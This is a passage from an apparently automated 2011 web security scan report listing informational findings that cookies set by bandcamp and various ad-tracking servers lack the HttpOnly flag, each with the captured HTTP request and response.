Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:24 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=2B50BEA79340BB1834AEF772993EEECA0D04FB1A; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:24 GMT
Connection: Keep-alive
Content-Length: 9768

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...

10.39. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:24 GMT
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=EB1D824AEDC2708913CE8C9801E9305201D6C6F9; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:24 GMT
Connection: Keep-alive
Content-Length: 8445

<!DOCTYPE HTML>
<html>
<head>
<meta name="apple-mobile-web-app-capable" content="yes" />


<script type="text/javascript" src="http://bandcamp.com/tmpdata/cache/yahoo-dom-event_8c9671
...[SNIP]...

10.40. http://bh.contextweb.com/bh/rtset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw; 536156_4_101378=1304949601925; vf=1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 03-May-2012 14:00:04 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 08-May-2012 14:00:04 GMT; Path=/
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:04 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.41. http://bid.openx.net/json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_27583348075&pid=dd81ea27-d6ee-482c-a1ae-66747444994b&s=468x60&f=0.6&cid=oxpv1%3A72-1331-4020-944-2650&hrid=02eea6ce6a94fccf845961f4c7a8855c-1304949600&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304805364

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=c440f793-2063-4ac9-9371-1aa8ec559ee1; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304949602; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_27583348075({"r":null});

10.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.43. http://cf.addthis.com/red/p.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dc7f39843ecbee9&callback=_ate.ad.hrr&pub=irishtimes&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.irishtimes.com%2Fnewspaper%2Ftheticket%2F2011%2F0506%2F1224296203710.html&1syp1cb HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=1304471550.60|1304471550.1OD|1304471550.1FE; dt=X; psc=4; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 09 May 2011 14:04:52 GMT
Set-Cookie: di=1304471550.1FE|1304471550.1OD|1304471550.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 14:04:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08-Jun-2011 14:04:52 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 09 May 2011 14:04:51 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

10.44. http://content.pulse360.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...

10.45. http://contextweb-match.dotomi.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://contextweb-match.dotomi.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: contextweb-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:00:07 GMT
X-Name: rtb-s02
Set-Cookie: Apache=173.193.214.243.1304949607632986; path=/
Cache-Control: max-age=0, no-store
Content-Length: 0
Connection: close
Content-Type: text/plain


10.46. http://core.insightexpressai.com/adServer/adServerESI.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adServer/adServerESI.aspx?bannerID=178140&script=false&redir=http://core.insightexpressai.com/adserver/1pixel.gif HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=32d59d941303349174; IXAIBannerCounter178074=1; IXAIFirstHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAILastHit2648=4%2f20%2f2011+9%3a07%3a30+PM; IXAICampaignCounter2648=1; IXAIBanners2648=178074; IXAIBanners2554=175183; IXAIBannerCounter175183=1; IXAIControlCounter2554=1; lastInvite=4%2f23%2f2011+4%3a30%3a01+PM; IXAIinvited2554=true; IXAIBannerCounter174602=1; IXAIFirstHit2460=4%2f23%2f2011+4%3a31%3a40+PM; IXAIBanners2460=174602,174595; IXAIBannerCounter174595=1; IXAILastHit2460=5%2f2%2f2011+2%3a16%3a33+PM; IXAICampaignCounter2460=2; IXAIBanners2579=178140; IXAIBannerCounter178140=1; IXAIFirstHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAILastHit2579=5%2f2%2f2011+1%3a51%3a33+PM; IXAICampaignCounter2579=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/7.0
Content-Length: 153
Content-Type: text/html
Location: http://core.insightexpressai.com/adserver/1pixel.gif
Set-Cookie: IXAIBanners2579=178140,178140; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter178140=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2579=5%2f9%2f2011+9%3a51%3a44+AM; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2579=2; domain=.insightexpressai.com; expires=Mon, 09-May-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:53 GMT
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:53 GMT
Connection: close
Cache-Control: no-store

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

10.47. http://cspix.media6degrees.com/orbserv/hbpix

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.irishtimes.com%2fnewspaper%2ftheticket%2f2011%2f0506%2f1224296203710.html HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1rw0fxzt1tr37xzt1tr37xzt1rw0fxzt113zye; adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh13zye00y3l010k0150k; rdrlst=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; sglst=20q0sc80lkb5u209jqc0063e000j00500ag2lkd7nq0kdwd00n3l010k0150kc81lkkpke0000000i3l010k0150ia6slkkpke0000000i3l010k0150i9rslkkpke00s1q00i3l010k0150iam5lkkxr8002zw00b3l010k0150b0kllklhm4000000053l010k015059q5lkb5u20abs200o3l010k0150kdgflkkpke00s1q00i3l010k0150i0t7ljyxb40yo8z00v3l010k0150kbo0lkb5u209jqc00o3l010k0150kbo1lkkyy000io40093l010k01509aoplkb5u209jqc0063e000j00500d86lklhm4000000053l010k01505942lkb5u20abs200o3l010k0150k8ndlkb5u20abs200o3l010k0150k719lkb5u209jqc0063e000j0050071alkkpke00s1q00i3l010k0150i56blkb5u20abs200o3l010k0150kasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j00500c5rlkov6e000000033l010k015034wclkb5u209jqc0063e000j005008eklkkpke00s1q00i3l010k0150i5mrlkb5u20abs200o3l010k0150kbwjlkkyy000io40093l010k01509; vstcnt=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt11407xxzt1tr37xzt1tr37xzt11407xxzt113zye; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: adh=1lkkxr8160352rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh1407x00z3l020k0250l; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: sglst=2280sbpelkxltm000000013l010k01501dsnlkxltm000000013l010k01501arllkxltm000000013l010k01501cg5lkxltm000000013l010k015019rslkkpke0cw9800j3l020k0250jam5lkkxr8002zw00c3l020k0250ccd4lkxltm000000013l010k01501crglkxltm000000013l010k01501cnolkxltm000000013l010k01501abelkxltm000000013l010k01501dd8lkxltm000000013l010k01501cy2lkxltm000000013l010k01501aoplkb5u209jqc0063e000j00500cnxlkxltm000000013l010k01501bq3lkxltm000000013l010k01501aoilkxltm000000013l010k01501bvplkxltm000000013l010k01501942lkb5u20mfzk00o3l000k005009ullkxltm000000013l010k015018ndlkb5u20mfzk00o3l000k00500bvclkxltm000000013l010k01501c5flkxltm000000013l010k0150156blkb5u20mfzk00o3l000k00500bjqlkxltm000000013l010k01501awklkxltm000000013l010k01501asulkb5u209jqc0063e000j00500crplkxltm000000013l010k01501asqlkxltm000000013l010k01501c5rlkov6e000000043l020k02504aw8lkxltm000000013l010k01501c60lkxltm000000013l010k01501dc4lkxltm000000013l010k01501d26lkxltm000000013l010k01501dnjlkxltm000000013l010k01501brilkxltm000000013l010k01501cbclkxltm000000013l010k01501c85lkxltm000000013l010k01501csslkxltm000000013l010k01501c80lkb5u209jqc0063e000j00500ag2lkd7nq0ke5w00o3l020k0250lc1elkxltm000000013l010k01501c81lkkpke0cw9800i3l000k005009grlkxltm000000013l010k01501c8flkxltm000000013l010k01501a6slkkpke0cw9800i3l000k00500dnalkxltm000000013l010k015019z6lkxltm000000013l010k01501dbtlkxltm000000013l010k015019q4lkxltm000000013l010k015010kllklhm40c47i0053l000k00500dyllkxltm000000013l010k01501b3zlkxltm000000013l010k015019q5lkb5u20mfzk00o3l000k005009mjlkxltm000000013l010k01501dgflkkpke0cw9800j3l020k0250j0t7ljyxb40yoii00w3l020k0250lbo0lkb5u20mfzk00p3l020k0250lbo1lkkyy00cmvm0093l000k005009pglkxltm000000013l010k01501d86lklhm40c47i0053l000k00500cwalkxltm000000013l010k01501dqllkxltm000000013l010k01501d84lkxltm000000013l010k01501dz3lkxltm000000013l010k01501cm6lkxltm000000013l010k01501cxdlkxltm000000013l010k01501719lkb5u20mfzk0073l010k0150271alkkpke0cw9800i3l000k00500ctplkxltm000000013l010k01501cc3lkxltm000000013l010k01501dgilkb5u209jqc006
3e000j00500cthlkxltm000000013l010k015014wclkb5u20mfzk0073l010k01502a0ulkxltm000000013l010k015015mrlkb5u20mfzk00o3l000k005008eklkkpke0cw9800i3l000k00500arilkxltm000000013l010k01501cbplkxltm000000013l010k01501bwjlkkyy00cmvm00a3l020k0250a9gelkxltm000000013l010k01501; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Set-Cookie: vstcnt=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; Domain=media6degrees.com; Expires=Sat, 05-Nov-2011 14:05:47 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=1287355&id=1287330&id=1280693&id=1277220&id=1277245&id=1266387&id=1265430&id=1265419&id=1264304&id=1261148&id=1259050&id=1259015&id=1258217&id=1256870&id=1256778&id=1256768&id=1256837&id=1256878&id=1255378&id=1256592
Content-Length: 0
Date: Mon, 09 May 2011 14:05:46 GMT


10.48. http://cw-m.d.chango.com/m/cw

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cw-m.d.chango.com
Path:   /m/cw

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/cw HTTP/1.1
Host: cw-m.d.chango.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_cw=1; _i_admeld=1; _i_ox=1; _i_st=1; _i_pm=1; _i_tm=1; _i_ab=1; _i_sl=1; _i_gid=1; _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://bh.contextweb.com/bh/rtset?do=add&ev=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe&pid=535495&rurl=http%3A//d.chango.com/m/s/contextweb&x=2011-06-23
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; Domain=chango.com; expires=Thu, 06 May 2021 14:00:03 GMT; Path=/
Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 23 Jun 2011 14:00:03 GMT; Path=/
Connection: close


10.49. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:05 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:04 GMT

GIF89a.............!.......,...........D..;

10.50. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 05-Nov-2011 14:00:06 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:05 GMT

GIF89a.............!.......,...........D..;

10.51. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/2931142961646634775

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/2931142961646634775 HTTP/1.1
Host: d.mediabrandsww.com
